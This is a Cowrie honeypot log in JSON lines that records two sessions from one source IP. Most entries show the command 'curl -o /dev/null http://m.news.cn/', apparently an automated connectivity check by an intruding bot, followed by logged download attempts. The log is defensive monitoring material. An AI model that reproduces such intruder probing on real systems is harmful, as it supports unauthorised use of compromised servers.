{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.433645Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.435601Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:02.437226Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.438192Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:02.472919Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.474140Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.476294Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.478083Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:02.480086Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.481375Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.515610Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:02.517208Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.518389Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.523241Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:02.526492Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.528401Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:02.565434Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.566722Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:02.576609Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.577744Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.597645Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.599413Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:02.610518Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.611767Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:02.626333Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.627589Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.656682Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.658144Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:02.661974Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.663043Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:02.680185Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.682199Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.709327Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:02.715032Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.716027Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:02.720314Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.721218Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:02.755051Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.756139Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.759917Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:02.761720Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.762628Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.764406Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.802253Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.802983Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:02.804801Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.805911Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.807933Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:02.819792Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.820901Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.843380Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:02.865653Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.867128Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.878994Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:02.881706Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.882873Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.897617Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.920224Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:02.926320Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.927646Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:02.940127Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.941304Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.945928Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.965116Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:02.978461Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.979942Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.995999Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:02.997540Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:02.998932Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.014330Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:03.022161Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.023470Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.042380Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:03.046272Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.047438Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.062575Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:03.064767Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.066230Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.093914Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:03.100194Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.101272Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:03.119309Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.120621Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.145089Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:03.148691Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.149929Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:03.163509Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.164847Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.176973Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:03.191548Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.192788Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.195595Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:03.203321Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.204564Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.221648Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.224072Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:03.234707Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.235942Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:03.240428Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.241479Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.260004Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.262439Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.294434Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.313204Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.333617Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.378136Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:03.380973Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.382268Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:03.384796Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.386008Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.399264Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.430193Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.432314Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:03.435146Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.435959Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:03.438070Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.438969Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:03.473470Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.474828Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.476862Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.478479Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:03.481369Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.482381Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:03.517314Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.518433Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:03.521038Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
